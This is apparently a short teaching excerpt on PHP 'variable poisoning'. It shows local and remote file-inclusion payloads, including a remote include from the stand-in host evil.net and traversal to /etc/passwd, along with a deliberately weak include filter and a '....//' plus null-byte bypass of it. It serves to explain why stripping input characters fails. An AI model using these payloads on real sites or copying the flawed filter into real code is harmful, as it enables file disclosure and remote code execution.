Variable Poisoning :: Chapter 3
Variable Poisoning :: Chapter 3
[Past Exploits]
./?page=ftp://user:pass@evil.net/arbitrary_code.php
./?page=../../../../../../../etc/passwd
New Code:
// php.ini :: allow_url_fopen = Off
if
(
!
preg_match
(
'/
\.
php
$
/i'
,
$
_GET
[
'page'
]
)
)
{
die
(
'Invalid request.'
)
;
}
$
include_file
=
str_replace
(
'../'
,
''
,
$
_GET
[
'page'
]
)
;
$
path
=
'/path/to/file/'
;
if
(
file_exists
(
$
path
.
$
include_file
)
)
{
include
$
path
.
$
include_file
;
}
Attack:
./?page=....//....//....//....//....//....//....//etc/passwd%00.php
Massaging data is BAD!
Null Zero